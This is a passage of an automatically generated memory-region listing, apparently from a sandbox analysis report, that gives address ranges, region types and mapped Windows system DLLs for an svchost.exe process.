name = "private_0x0000000001f00000"
filename = ""
Region:
id = 1281
start_va = 0x2030000
end_va = 0x20affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002030000"
filename = ""
Region:
id = 1282
start_va = 0x2170000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002170000"
filename = ""
Region:
id = 1283
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 1284
start_va = 0x2390000
end_va = 0x240ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 1285
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 1286
start_va = 0x24b0000
end_va = 0x252ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 1287
start_va = 0x2610000
end_va = 0x268ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 1288
start_va = 0x26a0000
end_va = 0x271ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 1289
start_va = 0x27a0000
end_va = 0x281ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 1290
start_va = 0x2830000
end_va = 0x28affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 1291
start_va = 0x2960000
end_va = 0x29dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002960000"
filename = ""
Region:
id = 1292
start_va = 0x2b50000
end_va = 0x2bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 1293
start_va = 0x2ce0000
end_va = 0x2d9ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1294
start_va = 0x2db0000
end_va = 0x2e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 1295
start_va = 0x2e40000
end_va = 0x2ebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e40000"
filename = ""
Region:
id = 1296
start_va = 0x2ec0000
end_va = 0x2f3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ec0000"
filename = ""
Region:
id = 1297
start_va = 0x2f40000
end_va = 0x2fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f40000"
filename = ""
Region:
id = 1298
start_va = 0x2fc0000
end_va = 0x30bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Region:
id = 1299
start_va = 0x30c0000
end_va = 0x32bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000030c0000"
filename = ""
Region:
id = 1300
start_va = 0x33b0000
end_va = 0x342ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000033b0000"
filename = ""
Region:
id = 1301
start_va = 0x3480000
end_va = 0x34fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003480000"
filename = ""
Region:
id = 1302
start_va = 0x3560000
end_va = 0x35dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003560000"
filename = ""
Region:
id = 1303
start_va = 0x3830000
end_va = 0x38affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003830000"
filename = ""
Region:
id = 1304
start_va = 0x39d0000
end_va = 0x3dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000039d0000"
filename = ""
Region:
id = 1305
start_va = 0x3e70000
end_va = 0x3eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003e70000"
filename = ""
Region:
id = 1306
start_va = 0x3f60000
end_va = 0x3fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f60000"
filename = ""
Region:
id = 1307
start_va = 0x4100000
end_va = 0x42fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004100000"
filename = ""
Region:
id = 1308
start_va = 0x4300000
end_va = 0x4afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 1309
start_va = 0x4b00000
end_va = 0x4efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 1310
start_va = 0x4f00000
end_va = 0x4ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f00000"
filename = ""
Region:
id = 1311
start_va = 0x5140000
end_va = 0x514ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005140000"
filename = ""
Region:
id = 1312
start_va = 0x67c0000
end_va = 0x683ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000067c0000"
filename = ""
Region:
id = 1313
start_va = 0x6f70000
end_va = 0x6feffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006f70000"
filename = ""
Region:
id = 1314
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1315
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1316
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1317
start_va = 0x77a50000
end_va = 0x77a56fff
monitored = 0
entry_point = 0x77a5106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1318
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1319
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1320
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1321
start_va = 0xff950000
end_va = 0xff95afff
monitored = 0
entry_point = 0xff95246c
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1322
start_va = 0x7fef35a0000
end_va = 0x7fef35aefff
monitored = 0
entry_point = 0x7fef35a9a48
region_type = mapped_file
name = "mspatcha.dll"
filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")
Region:
id = 1323
start_va = 0x7fef35b0000
end_va = 0x7fef3802fff
monitored = 0
entry_point = 0x7fef35b236c
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 1324
start_va = 0x7fef3b60000
end_va = 0x7fef3b7afff
monitored = 0
entry_point = 0x7fef3b61198
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 1325
start_va = 0x7fef4740000
end_va = 0x7fef4811fff
monitored = 0
entry_point = 0x7fef47d1a10
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 1326
start_va = 0x7fef48b0000
end_va = 0x7fef48c1fff
monitored = 0
entry_point = 0x7fef48b90bc
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1327
start_va = 0x7fef6550000
end_va = 0x7fef65b1fff
monitored = 0
entry_point = 0x7fef6551198
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 1328
start_va = 0x7fef6c10000
end_va = 0x7fef6c2bfff
monitored = 0
entry_point = 0x7fef6c111a0
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 1329
start_va = 0x7fef6d30000
end_va = 0x7fef6fa9fff
monitored = 0
entry_point = 0x7fef6d62200
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 1330
start_va = 0x7fef72a0000
end_va = 0x7fef72bcfff
monitored = 0
entry_point = 0x7fef72a2f18
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 1331
start_va = 0x7fef93f0000
end_va = 0x7fef946bfff
monitored = 0
entry_point = 0x7fef93f11d4
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 1332
start_va = 0x7fef9550000
end_va = 0x7fef9559fff
monitored = 0
entry_point = 0x7fef9553994
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1333
start_va = 0x7fef9560000
end_va = 0x7fef9576fff
monitored = 0
entry_point = 0x7fef9569d50
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1334
start_va = 0x7fef9580000
end_va = 0x7fef958bfff
monitored = 0
entry_point = 0x7fef958602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1335
start_va = 0x7fef9590000
end_va = 0x7fef9603fff
monitored = 0
entry_point = 0x7fef95966f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1336
start_va = 0x7fef9610000
end_va = 0x7fef9680fff
monitored = 0
entry_point = 0x7fef96551d0
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 1337
start_va = 0x7fef9690000
end_va = 0x7fef96a1fff
monitored = 0
entry_point = 0x7fef96989d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1338
start_va = 0x7fef96b0000
end_va = 0x7fef9764fff
monitored = 0
entry_point = 0x7fef972cf80
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 1339
start_va = 0x7fef9770000
end_va = 0x7fef97c9fff
monitored = 0
entry_point = 0x7fef97adde0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 1340
start_va = 0x7fef97d0000
end_va = 0x7fef97f0fff
monitored = 0
entry_point = 0x7fef97e03b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1341
start_va = 0x7fef9870000
end_va = 0x7fef9888fff
monitored = 0
entry_point = 0x7fef9871104
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 1342
start_va = 0x7fef9890000
end_va = 0x7fef98dffff
monitored = 0
entry_point = 0x7fef9891190
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 1343
start_va = 0x7fef98e0000
end_va = 0x7fef98e7fff
monitored = 0
entry_point = 0x7fef98e1020
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 1344
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1345
start_va = 0x7fef9910000
end_va = 0x7fef9971fff
monitored = 0
entry_point = 0x7fef994bd80
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 1346
start_va = 0x7fef9980000
end_va = 0x7fef9aabfff
monitored = 0
entry_point = 0x7fef9a30ef0
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 1347
start_va = 0x7fef9ab0000
end_va = 0x7fef9ac9fff
monitored = 0
entry_point = 0x7fef9ac3fbc
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 1348
start_va = 0x7fef9b60000
end_va = 0x7fef9b84fff
monitored = 0
entry_point = 0x7fef9b78c54
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 1349
start_va = 0x7fef9b90000
end_va = 0x7fef9bccfff
monitored = 0
entry_point = 0x7fef9b91070
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1350
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 1351
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1352
start_va = 0x7fef9d30000
end_va = 0x7fef9d76fff
monitored = 0
entry_point = 0x7fef9d31040
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 1353
start_va = 0x7fef9d80000
end_va = 0x7fef9dc1fff
monitored = 0
entry_point = 0x7fef9d817e4
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 1354
start_va = 0x7fef9dd0000
end_va = 0x7fef9e61fff
monitored = 0
entry_point = 0x7fef9e451ec
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 1355
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 0
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 1356
start_va = 0x7fef9ef0000
end_va = 0x7fef9f29fff
monitored = 0
entry_point = 0x7fef9f0d020
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1357
start_va = 0x7fefa220000
end_va = 0x7fefa283fff
monitored = 0
entry_point = 0x7fefa221254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1358
start_va = 0x7fefa290000
end_va = 0x7fefa300fff
monitored = 0
entry_point = 0x7fefa291010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1359
start_va = 0x7fefa3d0000
end_va = 0x7fefa3e6fff
monitored = 0
entry_point = 0x7fefa3d1060
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 1360
start_va = 0x7fefa3f0000
end_va = 0x7fefa59ffff
monitored = 0
entry_point = 0x7fefa3f1010
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 1361
start_va = 0x7fefa770000
end_va = 0x7fefa777fff
monitored = 0
entry_point = 0x7fefa771414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1362
start_va = 0x7fefa9b0000
end_va = 0x7fefaa26fff
monitored = 0
entry_point = 0x7fefa9bafd0
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1363
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1364
start_va = 0x7fefaa40000
end_va = 0x7fefab51fff
monitored = 0
entry_point = 0x7fefaa5f354
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1365
start_va = 0x7fefab60000
end_va = 0x7fefab6efff
monitored = 0
entry_point = 0x7fefab67e80
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 1366
start_va = 0x7fefab70000
end_va = 0x7fefab78fff
monitored = 0
entry_point = 0x7fefab73668
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 1367
start_va = 0x7fefab80000
end_va = 0x7fefab88fff
monitored = 0
entry_point = 0x7fefab81020
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 1368
start_va = 0x7fefab90000
end_va = 0x7fefabe5fff
monitored = 0
entry_point = 0x7fefab91040
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1369
start_va = 0x7fefabf0000
end_va = 0x7fefac4dfff
monitored = 0
entry_point = 0x7fefabf9024
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1370
start_va = 0x7fefac50000
end_va = 0x7fefac67fff
monitored = 0
entry_point = 0x7fefac51bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1371
start_va = 0x7fefac70000
end_va = 0x7fefac80fff
monitored = 0
entry_point = 0x7fefac716ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1372
start_va = 0x7fefaca0000
end_va = 0x7fefacf2fff
monitored = 0
entry_point = 0x7fefaca2b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1373
start_va = 0x7fefb280000
end_va = 0x7fefb288fff
monitored = 0
entry_point = 0x7fefb2811a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 1374
start_va = 0x7fefb290000
end_va = 0x7fefb2a3fff
monitored = 0
entry_point = 0x7fefb293e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1375
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1376
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1377
start_va = 0x7fefb2f0000
end_va = 0x7fefb356fff
monitored = 0
entry_point = 0x7fefb306060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1378
start_va = 0x7fefb370000
end_va = 0x7fefb37afff
monitored = 0
entry_point = 0x7fefb374f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 1379
start_va = 0x7fefb380000
end_va = 0x7fefb38bfff
monitored = 0
entry_point = 0x7fefb3815d8
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1380
start_va = 0x7fefb390000
end_va = 0x7fefb39ffff
monitored = 0
entry_point = 0x7fefb39835c
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1381
start_va = 0x7fefb3a0000
end_va = 0x7fefb3b8fff
monitored = 0
entry_point = 0x7fefb3a11a8
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1382
start_va = 0x7fefb3c0000
end_va = 0x7fefb3f6fff
monitored = 0
entry_point = 0x7fefb3c8424
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1383
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1384
start_va = 0x7fefb460000
end_va = 0x7fefb521fff
monitored = 0
entry_point = 0x7fefb46101c
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1385
start_va = 0x7fefb760000
end_va = 0x7fefb768fff
monitored = 0
entry_point = 0x7fefb761010
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 1386
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1387
start_va = 0x7fefb880000
end_va = 0x7fefb890fff
monitored = 0
entry_point = 0x7fefb8814c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1388
start_va = 0x7fefb8e0000
end_va = 0x7fefb950fff
monitored = 0
entry_point = 0x7fefb91ecc4
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 1389
start_va = 0x7fefb9d0000
end_va = 0x7fefb9e3fff
monitored = 0
entry_point = 0x7fefb9d16b4
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1390
start_va = 0x7fefb9f0000
end_va = 0x7fefba04fff
monitored = 0
entry_point = 0x7fefb9f1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1391
start_va = 0x7fefba10000
end_va = 0x7fefba1bfff
monitored = 0
entry_point = 0x7fefba118a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1392
start_va = 0x7fefba20000
end_va = 0x7fefba35fff
monitored = 0
entry_point = 0x7fefba211a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1393
start_va = 0x7fefbb50000
end_va = 0x7fefbb60fff
monitored = 0
entry_point = 0x7fefbb51070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1394
start_va = 0x7fefbcb0000
end_va = 0x7fefbce4fff
monitored = 0
entry_point = 0x7fefbcb1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1395
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1396
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1397
start_va = 0x7fefc2b0000
end_va = 0x7fefc2ccfff
monitored = 0
entry_point = 0x7fefc2b1ef4
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1398
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1399
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1400
start_va = 0x7fefc9a0000
end_va = 0x7fefca5afff
monitored = 0
entry_point = 0x7fefc9a6de0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1401
start_va = 0x7fefca60000
end_va = 0x7fefca66fff
monitored = 0
entry_point = 0x7fefca614b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1402
start_va = 0x7fefcb50000
end_va = 0x7fefcb6afff
monitored = 0
entry_point = 0x7fefcb52068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1403
start_va = 0x7fefcb70000
end_va = 0x7fefcb8dfff
monitored = 0
entry_point = 0x7fefcb713b8
region_type = mapped_file
name = "userenv.dll"
